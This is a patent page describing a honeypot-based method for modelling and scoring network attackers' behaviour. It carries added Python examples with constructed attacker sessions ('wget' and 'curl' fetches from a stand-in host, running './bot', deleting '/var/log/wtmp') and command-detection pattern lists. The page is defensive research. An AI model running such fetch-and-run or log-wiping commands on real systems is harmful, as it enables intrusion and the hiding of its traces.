CN106534195B - Network attacker behavior analysis method based on attack graph - Google Patents


Info

Publication number: CN106534195B (application CN201611178439.9A)
Authority: CN (China)
Prior art keywords: attack, attacker, state, network, index
Legal status: Active
Application number: CN201611178439.9A
Other languages: Chinese (zh)
Other versions: CN106534195A (en)
Inventors: 汪继锋, 颜炎, 程宏峰
Current Assignee: HANGZHOU SUNYARD DIGITAL TECHNOLOGY Co Ltd
Original Assignee: HANGZHOU SUNYARD DIGITAL TECHNOLOGY Co Ltd
Priority date: 2016-12-19
Filing date: 2016-12-19
Publication dates: CN106534195A on 2017-03-22; CN106534195B on 2019-10-08
Application filed by HANGZHOU SUNYARD DIGITAL TECHNOLOGY Co Ltd with priority to CN201611178439.9A; published as CN106534195A; application granted and published as CN106534195B; legal status Active.

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1433 Vulnerability analysis
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/1483 Countermeasures against malicious traffic service impersonation, e.g. phishing, pharming or web spoofing
    • H04L63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention discloses a network attacker behavior analysis method based on an attack graph, comprising the following steps: construct an attack behavior analysis model that attracts the attacker's attacks; capture attack data comprehensively using a data capture mechanism; generate an attack state transition diagram in combination with a finite state machine; and then analyze the attacker's behavior through an attack likelihood index, an attacker skill-level index and an attacker purpose index. The attack-graph-based network attacker behavior analysis method of the invention lays a sound foundation for the design of an active defense system: it not only defends against network attacks, but can also prevent and filter out part of the attacks before a network attack takes place, effectively preventing cybercrime, improving defense efficiency and reducing defense cost.

Description

Network attacker behavior analysis method based on attack graph
Technical field
The present invention relates to the field of active attack defense systems, and in particular to a network attacker behavior analysis method based on an attack graph.
Background technique
With the rapid development of computer networks, the modes of network attack keep multiplying. Traditional network intrusion prevention techniques such as firewalls and intrusion detection systems can hardly cope with attack means that emerge one after another. In particular, these techniques are mostly of the passive defense type and cannot respond in time to most newly emerging attacks. Although a firewall can prevent network attacks to a certain degree and improve network security, cyber-attack techniques and tools keep developing and appearing, the weaknesses of the firewall are gradually exposed, and an attacker can easily break through this layer of protection; another fatal defect is that a firewall cannot protect against virus attacks. Intrusion detection is the detection of intrusion behavior: it detects and monitors intrusions into the system by analyzing the collected network behavior, log information and communication data, and analyzes the intruder's behavior. However, the rule database and intrusion analysis module of an intrusion detection system have to change constantly as new attack techniques emerge; at the same time the system cannot detect attacks that are not in its rule database, so intrusion detection either fails to respond in time or responds incorrectly to an attack. For this reason, an active defense system based on attack behavior analysis is particularly important. The attack-graph-based network attacker behavior analysis method of the present invention lays a sound foundation for the design of an active defense system.
Summary of the invention
The object of the present invention is to provide a network attacker behavior analysis method based on an attack graph, so as to overcome the deficiencies of the prior art.
The invention adopts the following technical scheme:
A network attacker behavior analysis method based on an attack graph comprises the following steps:
1) Construct an attack behavior analysis model to attract attacks from the attacker;
2) Data collection: capture attack data comprehensively using a data capture mechanism;
3) Behavior analysis: following the principle of a finite state machine, the nodes of the state machine represent the states reached by attack behavior, ordered by attack time, and state changes caused by attack behavior represent transitions; by monitoring the attacker's attack behavior in real time, the attacker's attack process is depicted with the finite state machine, thereby generating an attack state transition diagram; the attacker's behavior is then analyzed through the attack likelihood index, the attacker skill-level index and the attacker purpose index.
Further, in step 1) the network structure of the attack behavior analysis model consists of an SSH gateway, hosts and a controller, divided into three network segments forming a master-slave architecture: the SSH gateway and the host series machines are in the honeypot segment, the host series machines and the controller are in the management segment, and the SSH gateway and the controller are in the Internet segment; the three segments are connected through three switches so as to model a real host network and lure every kind of attack behavior into interacting with the honeypot hosts.
Further, the SSH gateway performs security verification of the visitor's password or key through the SSH protocol; each host is built on OpenVZ, on which multiple isolated virtual private servers are created and multiple virtual machines are built internally, each running a Linux operating system; the controller collects and processes the attack data.
Further, the data capture mechanism in step 2): the data record of the attacker's attack behavior first passes through the iptables firewall, which records the connections flowing in; snort_inline is then skipped directly, but Snort records all outgoing information; on the honeypot hosts, a Sebek client is deployed to record the attacker's attack behavior on them and send the recorded information to the Sebek server.
Further, the process of generating the attack state transition diagram in step 3) is as follows:
31) Establish the initial state set of the attack, i.e. S0;
32) Establish the attack edge set attack_state; starting from the initial state S0, monitor each attack behavior of the attacker, add to attack_state every state in which a node's state changes or the node itself changes, and assign each edge a quantized weight value W;
33) While the attacker's connection is not disconnected, repeat operation 32);
34) When the attacker's connection to the honeypot host is disconnected, generate the state transition diagram and append the end state Se at the end of attack_state.
Further, the attack likelihood index in step 3): using the generated attack state transition diagram, count the probability of occurrence of each state; let the probability of going from one state to another, i.e. the transition probability from state Si-1 to state Si, be pk, k = 1, 2, ..., i; then the likelihood of the current attack is:
Further, the attacker skill-level index in step 3): the attacker's skill level is analyzed comprehensively by the following four criteria, and attackers meeting a condition are scored: a. whether the attacker cares about being discovered; b. whether the attacker cares about the target's environment before attacking; c. the attacker's familiarity with malware; d. whether the attacker takes certain protective measures for the compromised computer.
Further, the scorable criteria formulated according to the four standards include: 1. hiding: deletion or cancellation of log files at login, assessed by the proportion of login log files hidden by the attacker; 2. restoring deleted files: restoration of deleted files, assessed by the proportion of deleted files restored; 3. deleting downloaded files: whether the rogue software is deleted after being downloaded and used, scored 0 if deleted and 1 otherwise; 4. checking current users: whether the attacker checks the system for other current users, assessed by whether other users are checked; 5. inspecting the system: observing the system's configuration and state, scored 1 if detected and 0 otherwise; 6. editing configuration files: whether configuration files are modified by the rogue software during the whole process, scored 1 if modified and 0 otherwise; 7. changing the system: modifying the system's configuration files or state, scored 1 if changed and 0 otherwise; 8. creating a new user: adding a new username and password, scored 1 if added and 0 otherwise; 9. installing rogue software: the attacker installs rogue software on the target machine, scored 1 if installed and 0 otherwise; 10. changing the password: modifying a user's password, scored 1 if modified and 0 otherwise.
Further, the attacker purpose index in step 3) deduces the attacker's attack purpose by screening the different rogue software used by the attacker.
Beneficial effects of the present invention:
1. The present invention attracts the attacker's attacks by constructing an attack behavior analysis model, captures attack data comprehensively using a data capture mechanism, generates an attack state transition diagram in combination with a finite state machine, and then analyzes the attacker's behavior through the attack likelihood index, the attacker skill-level index and the attacker purpose index. Through the analysis of attack behavior, the present invention can deeply explore the internal links, regularities and dynamic characteristics among various attacks so as to predict attack behavior and build an active defense system, which is of great significance for discovering and characterizing network security events and improving the overall network security protection capability.
2. The attack-graph-based network attacker behavior analysis method of the present invention lays a sound foundation for the design of an active defense system: it not only defends against network attacks, but can also prevent and filter out part of the attacks before a network attack takes place, effectively preventing cybercrime, improving defense efficiency and reducing defense cost.
Description of the drawings
Fig. 1 is a flow diagram of the method of the present invention.
Fig. 2 is the deployment network structure diagram of the attack behavior analysis model.
Fig. 3 is the system diagram of the data capture mechanism.
Fig. 4 is the state transition diagram of the finite state machine.
Fig. 5 is the network attacker behavior analysis diagram.
Detailed description of the embodiments
The present invention is further explained below with reference to embodiments and the accompanying drawings. The following examples serve only to illustrate the present invention and are not intended to limit its scope of application.
A network attacker behavior analysis method based on an attack graph, as shown in Fig. 1, comprises the following steps:
1) Construct an attack behavior analysis model to attract attacks from the attacker. The attack behavior analysis model is a honeypot, whose deployment network structure is shown in Fig. 2: it consists of an SSH gateway (SSH Gateway), hosts (Host) and a controller (Collector), divided into three network segments forming a master-slave architecture; the SSH gateway and the host series machines are in the honeypot segment, the host series machines and the controller are in the management segment, and the SSH gateway and the controller are in the Internet segment; the three segments are connected through three switches so as to model a real host network and lure every kind of attack behavior into interacting with the honeypot hosts. The SSH gateway performs security verification of the visitor's password or key through the SSH protocol. Each host is built on OpenVZ, on which multiple isolated virtual private servers (VPS) are created and multiple virtual machines are built internally, each running a Linux operating system; because Linux is open source, attackers study this system more and find security vulnerabilities in it more easily to attack. The controller is the core of the model and is mainly responsible for collecting and processing the attack data.
2) Data collection: capture attack data comprehensively using a data capture mechanism. The purpose and meaning of configuring the honeypot system are mainly embodied in data acquisition; detailed captured data make it possible to replay the attacker's attack process. Attack data are captured comprehensively using the data capture mechanism, so as to guarantee that detailed information is provided for the behavior analysis of the next stage. The data capture mechanism system is shown in Fig. 3: the data record of the attacker's attack behavior first passes through the iptables firewall, which records the connections flowing in; snort_inline is then skipped directly, but Snort records all outgoing information, which can thus be used for attack analysis; on the honeypot hosts, a Sebek client is deployed to record the attacker's attack behavior on them and send the recorded information to the Sebek server.
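As an added example (not code from the patent), the following Python parses constructed iptables LOG lines, the first stage of the data capture mechanism described in step 2) above and in the summary, and keeps only the new inbound connections to the honeypot that the firewall log records; the Snort and Sebek stages are not shown. The HONEYPOT-IN log prefix, the documentation-range addresses, the honeypot port list and the function names `parse_log_line`, `inbound_connections` and `connections_by_source` are this example's own assumptions.

```python
"""Inbound-connection records from iptables LOG lines (first stage of the
page's data capture mechanism). Added example, not the patent's code; the log
lines are constructed in the standard iptables LOG KEY=VALUE format, and the
"one session per SRC/SPT pair" grouping is this example's assumption."""
from collections import defaultdict

TCP_FLAGS = ("SYN", "ACK", "FIN", "RST", "PSH", "URG")


def parse_log_line(line: str) -> dict:
    """Return the KEY=VALUE fields of one iptables LOG line; bare TCP flag
    tokens (SYN, ACK, ...) are collected under "FLAGS"."""
    fields = {}
    for tok in line.split():
        if "=" in tok:
            key, value = tok.split("=", 1)
            fields[key] = value
        elif tok in TCP_FLAGS:
            fields.setdefault("FLAGS", []).append(tok)
    return fields


def inbound_connections(lines, honeypot_ports=(22,)) -> list:
    """Keep only new inbound TCP connections (SYN without ACK) to honeypot ports,
    i.e. the "connections flowing in" that the page says iptables records."""
    conns = []
    for line in lines:
        f = parse_log_line(line)
        if f.get("PROTO") != "TCP" or f.get("IN", "") == "":
            continue                      # not TCP, or not an inbound packet
        flags = f.get("FLAGS", [])
        if "SYN" not in flags or "ACK" in flags:
            continue                      # not the first packet of a connection
        if int(f.get("DPT", 0)) not in honeypot_ports:
            continue                      # port the honeypot does not expose
        conns.append({"src": f["SRC"], "spt": int(f["SPT"]),
                      "dst": f["DST"], "dpt": int(f["DPT"])})
    return conns


def connections_by_source(conns) -> dict:
    """Group inbound connections per source address: one attacker may open
    several sessions, and all of them feed the later behavior analysis."""
    by_src = defaultdict(list)
    for c in conns:
        by_src[c["src"]].append(c)
    return dict(by_src)


# Constructed log lines (TEST-NET addresses, --log-prefix "HONEYPOT-IN: ").
LOG_LINES = [
    "Dec 19 10:01:02 gw kernel: [1000.10] HONEYPOT-IN: IN=eth0 OUT= "
    "MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=192.0.2.10 "
    "LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=1234 DF PROTO=TCP SPT=51234 DPT=22 "
    "WINDOW=29200 RES=0x00 SYN URGP=0",
    # later packet of the same connection: ACK only, so not a new connection
    "Dec 19 10:01:02 gw kernel: [1000.12] HONEYPOT-IN: IN=eth0 OUT= "
    "SRC=198.51.100.7 DST=192.0.2.10 LEN=52 PROTO=TCP SPT=51234 DPT=22 ACK URGP=0",
    # UDP to the DNS port: not an SSH connection to the honeypot
    "Dec 19 10:03:40 gw kernel: [1158.30] HONEYPOT-IN: IN=eth0 OUT= "
    "SRC=203.0.113.9 DST=192.0.2.10 LEN=40 PROTO=UDP SPT=40000 DPT=53",
    "Dec 19 10:03:41 gw kernel: [1159.01] HONEYPOT-IN: IN=eth0 OUT= "
    "SRC=203.0.113.9 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=42000 DPT=22 SYN URGP=0",
    # new connection, but to a port the honeypot does not expose
    "Dec 19 10:05:00 gw kernel: [1238.00] HONEYPOT-IN: IN=eth0 OUT= "
    "SRC=198.51.100.7 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=51240 DPT=80 SYN URGP=0",
]

if __name__ == "__main__":
    conns = inbound_connections(LOG_LINES)
    for src, sessions in connections_by_source(conns).items():
        print(src, [(c["spt"], c["dpt"]) for c in sessions])
```

Filtering on SYN-without-ACK keeps one record per connection rather than one per packet, which is what the later state-machine stage needs: each record becomes one attacker session whose commands are then captured on the host.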
3) Behavior analysis: the attack-graph-based behavior analysis mainly uses, following the principle of the finite state machine, the nodes of the state machine to represent the states reached by attack behavior, ordered by attack time, with state changes caused by attack behavior representing transitions; by monitoring the attacker's attack behavior in real time, the attacker's attack process is depicted with the finite state machine, thereby generating the attack state transition diagram; the attacker's behavior is then analyzed through the attack likelihood index, the attacker skill-level index and the attacker purpose index.
The related definitions of the attack behavior finite state machine are given below:
Definition 1 (attack state machine): the finite state machine of attack behavior can be defined as a 3-tuple M = {S, Σ, δ}, where S is the set of attack finite states, Σ is the event set, and δ is the attack state transition function, a mapping function S × Σ → S;
Definition 2 (node): the next possible attack state that the intruder may reach, according to the current state and the successful attacks in the preceding process;
Definition 3 (edge): the connection from one state to another that an attacker in the finite state machine produces by taking any attack behavior through the attack state transition function, such as installing new rogue software or adding a vulnerability;
Definition 4 (attack route): a path in the attack state diagram, i.e. a segment of the attack sequence, starting at the initial state S0 ∈ S and ending at Se ∈ S; for example, an attack route can be expressed as S1→S2→...→Si→...→Se;
Definition 5 (attack purpose): the attacker's attack purpose is expressed as Dgoal; for the deployed honeypot system, the attack route by which the intruder reaches the attack purpose is Sunsafe, so the attack state diagram represents the set of all Sunsafe from S0 to Dgoal.
Combining the analysis of attacks on the honeypot system with an understanding of the network system's status, the attack behavior issued from the moment the attacker intrudes into the honeypot host is the initial state, and the state when the attacker exits the honeypot host is the end state; from these, all attackers' attack routes are found.
State transition diagram generating algorithm:
Input: M = {S, Σ, δ} // finite state machine model;
Output: G // attack state diagram.
The process of generating the attack state transition diagram is as follows:
31) Establish the initial state set of the attack, i.e. S0;
32) Establish the attack edge set attack_state; starting from the initial state S0, monitor each attack behavior of the attacker, add to attack_state every state in which a node's state changes or the node itself changes, and assign each edge a quantized weight value W;
33) While (the attacker's connection is not disconnected && attack_state->next is not empty) repeat operation 32);
34) If (the attacker's connection to the honeypot host is disconnected) generate the state transition diagram and append the end state Se at the end of attack_state.
The command sets relevant to state transitions are as follows:
M(s): the set of commands that modify system files; H(s): the set of commands that check and modify login logs to hide attack traces; D(s): the download command set; I(s): the set of commands that install software and programs; R(s): the set of commands that run malware and programs; CH(s): the set of commands that check system hardware and software information; C(s): the set of commands that create new users and modify passwords. The state transitions of the finite state machine are shown in Fig. 4.
Because of the uncertainty of attack behavior, the attacker's behavior cannot be assessed by subjective guesswork; the present invention therefore analyzes the attacker's behavior by formulating the following three indices: the attack likelihood index, the attacker skill-level index and the attacker purpose index.
Attack likelihood index: using the generated attack state transition diagram, count the probability of occurrence of each state; assume that the probability of going from one state to another, i.e. the transition probability from state Si-1 to state Si, is pk, k = 1, 2, ..., i; then the likelihood of the current attack is:
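The following Python is an added example, not code from the patent, of the state transition diagram generating algorithm (steps 31 to 34, as given in both the summary and the embodiment above) driven by the command sets M(s), H(s), D(s), I(s), R(s), CH(s) and C(s), followed by an estimate of the transition probabilities pk from the generated diagrams for the attack likelihood index. Which commands fall into each set, the edge weights W, the three constructed sessions and the function names are this example's assumptions; the patent's own likelihood formula does not appear on this page, so `route_likelihood` multiplies the pk along a route as one plausible aggregate and is likewise an assumption.

```python
"""Attack state transition diagram (steps 31-34) built from a captured command
sequence, plus empirical transition probabilities p_k over generated diagrams.
Added example, not the patent's code; command patterns, weights and sessions
are constructed assumptions."""
from collections import Counter
from math import prod

INITIAL, END = "S0", "Se"

# The page's command sets; which commands belong to each is this example's
# assumption. Patterns containing a space or ending in "/" match the command
# prefix, single words match the first token. Order matters: H (log tampering)
# is checked before M so "rm /var/log/..." is not taken as a file edit.
COMMAND_SETS = {
    "H": ("history", "unset HISTFILE", "rm /var/log", "last"),  # hide traces / edit login logs
    "M": ("sed", "vi", "echo", "tee"),                          # modify system files
    "D": ("wget", "curl", "scp", "ftp"),                        # download
    "I": ("make install", "apt", "yum", "tar"),                 # install software / programs
    "R": ("./", "nohup", "perl", "python"),                     # run malware / programs
    "CH": ("uname", "cat /proc", "ifconfig", "ps", "w"),        # check hardware / software info
    "C": ("useradd", "adduser", "passwd"),                      # create users / change passwords
}

# Quantized edge weight W per reached state (constructed: rough severity).
EDGE_WEIGHT = {"CH": 1, "D": 2, "H": 3, "M": 3, "I": 3, "R": 4, "C": 4}


def classify(cmd: str):
    """Map one captured shell command to its command set, or None if unknown."""
    tokens = cmd.split()
    first = tokens[0] if tokens else ""
    for state, patterns in COMMAND_SETS.items():
        for pat in patterns:
            hit = cmd.startswith(pat) if (" " in pat or pat.endswith("/")) else first == pat
            if hit:
                return state
    return None


def build_transition_diagram(session):
    """Steps 31-34. `session` is [(attack_time, event)], event a command string
    or "DISCONNECT". Returns (nodes, attack_state), attack_state being the edge
    list [(from_state, to_state, W)]."""
    nodes = {INITIAL}                      # 31) initial state set S0
    attack_state = []                      # 32) edge set
    current = INITIAL
    for _, event in sorted(session, key=lambda e: e[0]):   # attack-time order
        if event == "DISCONNECT":          # 34) connection closed: append Se
            attack_state.append((current, END, 0))
            nodes.add(END)
            break
        reached = classify(event)
        if reached is None or reached == current:
            continue                       # no state change: no new edge (design choice)
        attack_state.append((current, reached, EDGE_WEIGHT[reached]))
        nodes.add(reached)
        current = reached                  # 33) still connected: keep monitoring
    return nodes, attack_state


def transition_probabilities(diagrams):
    """p_k for each observed transition S_{i-1} -> S_i, estimated as the share of
    S_{i-1}'s outgoing edges that lead to S_i across all generated diagrams
    (the frequency estimate is this example's assumption)."""
    pair, out = Counter(), Counter()
    for _, edges in diagrams:
        for src, dst, _ in edges:
            pair[(src, dst)] += 1
            out[src] += 1
    return {k: n / out[k[0]] for k, n in pair.items()}


def route_transition_probs(route, probs):
    """The p_k along an attack route S0 -> ... -> Se."""
    return [probs.get(step, 0.0) for step in zip(route, route[1:])]


def route_likelihood(route, probs):
    """Product of the p_k along the route: one natural aggregate, and this
    example's assumption since the patent's formula is not reproduced here."""
    return prod(route_transition_probs(route, probs))


# Constructed sessions in the shape a Sebek-style keystroke capture would yield.
SESSION_A = [(1, "w"), (2, "wget http://host.invalid/bot.tgz"), (3, "tar xzf bot.tgz"),
             (4, "./bot"), (5, "rm /var/log/wtmp"), (6, "DISCONNECT")]
SESSION_B = [(1, "uname -a"), (2, "curl -O http://host.invalid/scan"), (3, "./scan"),
             (4, "DISCONNECT")]
SESSION_C = [(1, "cat /proc/cpuinfo"), (2, "useradd backup2"), (3, "passwd backup2"),
             (4, "DISCONNECT")]

if __name__ == "__main__":
    diagrams = [build_transition_diagram(s) for s in (SESSION_A, SESSION_B, SESSION_C)]
    probs = transition_probabilities(diagrams)
    route = [INITIAL] + [dst for _, dst, _ in diagrams[0][1]]
    print("route A:", " -> ".join(route))
    print("p_k:", route_transition_probs(route, probs))
    print("likelihood:", route_likelihood(route, probs))
```

Over the three constructed sessions every route starts S0 -> CH, so that transition gets pk = 1, while CH -> D is seen in two of three sessions (pk = 2/3) and D -> I in one of two (pk = 1/2); the more diagrams the honeypot collects, the better these estimates and the more meaningful a low likelihood becomes as a signal of an unusual route.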
Attacker skill-level index: the attacker's skill level is analyzed comprehensively by formulating the following four common criteria, and attackers meeting a condition are scored:
a. Whether the attacker cares about being discovered
Such attackers usually act more carefully; whether they care about being discovered is judged by four criteria. I. They delete the log files containing traces of the attacker's activity; II. If log files are deleted, the attacker usually finds that the log files have shrunk and restores them; III. During the attack they also check whether other users are using the system; IV. They also delete the files they imported into the machine from the Internet.
b. Whether the attacker cares about the target's environment before attacking
Two criteria are formulated: I. whether the attacker gets to know the target machine before attacking, and whether the environment (especially the network environment) is of concern; II. whether the presence of other users was of concern before the attack.
c. The attacker's familiarity with malware
Three criteria are formulated: I. whether the attacker is familiar with the rogue software; for example, some malware has network functions, yet it is installed on a target machine whose network ports are blocked; II. whether the attacker modifies the system's configuration files when installing the rogue software; III. whether the attacker finally installs the rogue software successfully and modifies the whole system.
d. Whether the attacker takes certain protective measures for the compromised computer
I. If an attacker has broken into a machine by brute force and still breaks in by brute force on the next attack, this shows that the username/password credentials of the machine the attacker has compromised are weak; conversely, they are strong. II. Whether the attacker creates a new username and password after compromising the machine, for the next login.
Based on the deployment of the system, the present invention formulates a series of scorable criteria for evaluating the attacker's technical capability, mainly including: 1. hiding: deletion or cancellation of log files at login, assessed by the proportion of login log files hidden by the attacker; 2. restoring deleted files: restoration of deleted files, assessed by the proportion of deleted files restored; 3. deleting downloaded files: whether the rogue software is deleted after being downloaded and used, scored 0 if deleted and 1 otherwise; 4. checking current users: whether the attacker checks the system for other current users, assessed by whether other users are checked; 5. inspecting the system: observing the system's configuration and state, scored 1 if detected and 0 otherwise; 6. editing configuration files: whether configuration files are modified by the rogue software during the whole process, scored 1 if modified and 0 otherwise; 7. changing the system: modifying the system's configuration files or state, scored 1 if changed and 0 otherwise; 8. creating a new user: adding a new username and password, scored 1 if added and 0 otherwise; 9. installing rogue software: the attacker installs rogue software on the target machine, scored 1 if installed and 0 otherwise; 10. changing the password: modifying a user's password, scored 1 if modified and 0 otherwise.
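As an added example, not the patent's code, the following Python applies the ten scorable criteria above to an observation record for one attacker: criteria 1 and 2 are proportions, criterion 3 scores 0 when the download was deleted and 1 otherwise, and criteria 4 to 10 are 1/0 flags. The `SessionEvidence` fields, the two constructed attackers and the summation into a single index (the page scores each criterion but states no aggregation) are this example's assumptions.

```python
"""Attacker skill-level index: the page's ten scorable criteria applied to one
attacker's observed session. Added example, not the patent's code; the evidence
fields, the sample attackers and the summation are this example's assumptions."""
from dataclasses import dataclass


@dataclass
class SessionEvidence:
    """Counts and flags a capture layer (iptables/Snort/Sebek on the page) would
    yield for one attacker; the field names are constructed."""
    login_logs_present: int     # login log files on the host when the attacker arrived
    login_logs_hidden: int      # of those, deleted or cancelled by the attacker (criterion 1)
    files_deleted: int          # files the attacker deleted
    files_restored: int         # of those, restored again (criterion 2)
    deleted_download: bool      # rogue software deleted after download and use (criterion 3)
    checked_users: bool         # checked the system for other current users (4)
    inspected_system: bool      # observed system configuration and state (5)
    edited_config: bool         # configuration files modified by the rogue software (6)
    changed_system: bool        # system configuration files or state modified (7)
    created_user: bool          # new username and password added (8)
    installed_rogue: bool       # rogue software installed on the target (9)
    changed_password: bool      # a user's password modified (10)


def _ratio(part: int, whole: int) -> float:
    """Proportion score for criteria 1 and 2; 0 when there was nothing to hide or restore."""
    return part / whole if whole else 0.0


def score_criteria(ev: SessionEvidence) -> dict:
    """Per-criterion scores as the page defines them: 1 and 2 are proportions,
    3 is 0 if the download was deleted and 1 otherwise, 4 to 10 are 1/0."""
    return {
        "1_hide": _ratio(ev.login_logs_hidden, ev.login_logs_present),
        "2_restore_deleted": _ratio(ev.files_restored, ev.files_deleted),
        "3_delete_download": 0 if ev.deleted_download else 1,
        "4_check_users": int(ev.checked_users),
        "5_inspect_system": int(ev.inspected_system),
        "6_edit_config": int(ev.edited_config),
        "7_change_system": int(ev.changed_system),
        "8_create_user": int(ev.created_user),
        "9_install_rogue": int(ev.installed_rogue),
        "10_change_password": int(ev.changed_password),
    }


def skill_index(ev: SessionEvidence) -> float:
    """Sum of the ten criterion scores (the aggregation is this example's assumption)."""
    return sum(score_criteria(ev).values())


def rank_attackers(evidence_by_id: dict) -> list:
    """Attacker ids ordered from highest to lowest skill index, for analyst triage."""
    return sorted(evidence_by_id, key=lambda k: skill_index(evidence_by_id[k]), reverse=True)


# Constructed observations for two attackers.
CAREFUL = SessionEvidence(login_logs_present=4, login_logs_hidden=3, files_deleted=2,
                          files_restored=1, deleted_download=True, checked_users=True,
                          inspected_system=True, edited_config=False, changed_system=True,
                          created_user=True, installed_rogue=True, changed_password=False)
NOISY = SessionEvidence(login_logs_present=4, login_logs_hidden=0, files_deleted=0,
                        files_restored=0, deleted_download=False, checked_users=False,
                        inspected_system=False, edited_config=False, changed_system=False,
                        created_user=False, installed_rogue=True, changed_password=False)

if __name__ == "__main__":
    for name, ev in (("careful", CAREFUL), ("noisy", NOISY)):
        print(name, score_criteria(ev), skill_index(ev))
    print(rank_attackers({"careful": CAREFUL, "noisy": NOISY}))
```

Keeping the per-criterion dictionary alongside the total lets an analyst see which standard (a to d) drove a high index, for instance whether it came from trace hiding or from post-compromise changes to the system.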
Determining the attacker's purpose is very difficult, because it involves a large number of subjective factors and contingencies; therefore only a guess at the attacker's target can be offered from appearances. Here, the attacker's attack purpose is mainly deduced by examining the different rogue software the attacker uses. For example: 1. some attackers want to install software such as an IRC bot to register the compromised host in a botnet that communicates through the IRC protocol; 2. installing software such as an IRC bouncer to perform IP address spoofing under the IRC protocol; 3. installing software such as a backdoor to let the attacker return by another route; 4. installing a port scanning tool such as a scanner to find potential security vulnerabilities; 5. downloading a file editor to help the attacker attack the host better using hidden scripts; 6. installing software such as a flooder to send large volumes of packets to other IP addresses so as to deny them service, etc.
With the attack graph idea and the analysis of the attack indices described above, the attack-graph-based network attacker behavior analysis can be constructed, as shown in Fig. 5.

Claims (3)

1. A network attacker behavior analysis method based on an attack graph, characterized in that it comprises the following steps:
1) Construct an attack behavior analysis model to attract attacks from the attacker; the network structure of the attack behavior analysis model consists of an SSH gateway, hosts and a controller, divided into three network segments forming a master-slave architecture; the SSH gateway and the host series machines are in the honeypot segment, the host series machines and the controller are in the management segment, and the SSH gateway and the controller are in the Internet segment; the three segments are connected through three switches so as to model a real host network and lure every kind of attack behavior into interacting with the honeypot hosts;
2) Data collection: capture attack data comprehensively using a data capture mechanism; data capture mechanism: the data record of the attacker's attack behavior first passes through the iptables firewall, which records the connections flowing in; snort_inline is then skipped directly, but Snort records all outgoing information; on the honeypot hosts, a Sebek client is deployed to record the attacker's attack behavior on them and send the recorded information to the Sebek server;
3) Behavior analysis: following the principle of a finite state machine, the nodes of the state machine represent the states reached by attack behavior, ordered by attack time, and state changes caused by attack behavior represent transitions; by monitoring the attacker's attack behavior in real time, the attacker's attack process is depicted with the finite state machine, thereby generating an attack state transition diagram; the attacker's behavior is then analyzed through the attack likelihood index, the attacker skill-level index and the attacker purpose index;
wherein the process of generating the attack state transition diagram is as follows:
31) Establish the initial state set of the attack, i.e. S0;
32) Establish the attack edge set attack_state; starting from the initial state S0, monitor each attack behavior of the attacker, add to attack_state every state in which a node's state changes or the node itself changes, and assign each edge a quantized weight value W;
33) While the attacker's connection is not disconnected, repeat operation 32);
34) When the attacker's connection to the honeypot host is disconnected, generate the state transition diagram and append the end state Se at the end of attack_state;
Attack likelihood index: using the generated attack state transition diagram, count the probability of occurrence of each state; let the probability of going from one state to another, i.e. the transition probability from state Si-1 to state Si, be pk, k = 1, 2, ..., i; then the likelihood of the current attack is:
Attacker skill-level index: the attacker's skill level is analyzed comprehensively by the following four criteria, and attackers meeting a condition are scored: a. whether the attacker cares about being discovered; b. whether the attacker cares about the target's environment before attacking; c. the attacker's familiarity with malware; d. whether the attacker takes certain protective measures for the compromised computer;
Attacker purpose index: the attacker's attack purpose is deduced by screening the different rogue software used by the attacker.
2. The network attacker behavior analysis method based on an attack graph according to claim 1, characterized in that the SSH gateway performs security verification of the visitor's password or key through the SSH protocol; each host is built on OpenVZ, on which multiple isolated virtual private servers are created and multiple virtual machines are built internally, each running a Linux operating system; the controller collects and processes the attack data.
3. The network attacker behavior analysis method based on an attack graph according to claim 1, characterized in that the scorable criteria of the attacker skill-level index formulated according to the four standards include: 1. hiding: deletion or cancellation of log files at login, assessed by the proportion of login log files hidden by the attacker; 2. restoring deleted files: restoration of deleted files, assessed by the proportion of deleted files restored; 3. deleting downloaded files: whether the rogue software is deleted after being downloaded and used, scored 0 if deleted and 1 otherwise; 4. checking current users: whether the attacker checks the system for other current users, assessed by whether other users are checked; 5. inspecting the system: observing the system's configuration and state, scored 1 if detected and 0 otherwise; 6. editing configuration files: whether configuration files are modified by the rogue software during the whole process, scored 1 if modified and 0 otherwise; 7. changing the system: modifying the system's configuration files or state, scored 1 if changed and 0 otherwise; 8. creating a new user: adding a new username and password, scored 1 if added and 0 otherwise; 9. installing rogue software: the attacker installs rogue software on the target machine, scored 1 if installed and 0 otherwise; 10. changing the password: modifying a user's password, scored 1 if modified and 0 otherwise.
Application CN201611178439.9A (priority date 2016-12-19, filing date 2016-12-19): Network attacker behavior analysis method based on attack graph; status Active; granted as CN106534195B (en).

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201611178439.9A (CN106534195B, en) 2016-12-19 2016-12-19 Network attacker behavior analysis method based on attack graph

Publications (2)

Publication Number Publication Date
CN106534195A (en) 2017-03-22
CN106534195B (en) 2019-10-08

Family

ID=58341118

Country Status (1)

Country Link
CN (1) CN106534195B (en)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US11824894B2 (en) 2020-11-25 2023-11-21 International Business Machines Corporation Defense of targeted database attacks through dynamic honeypot database response generation

Families Citing this family (17)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN108629474B (en) * 2017-03-24 2021-11-12 北京航天计量测试技术研究所 Process safety assessment method based on attack graph model
CN107317824B (en) * 2017-08-01 2023-07-25 北京观数科技有限公司 Real network attack and defense exercise system with controllable risk
CN108040070A (en) * 2017-12-29 2018-05-15 北京奇虎科技有限公司 A kind of network security test platform and method
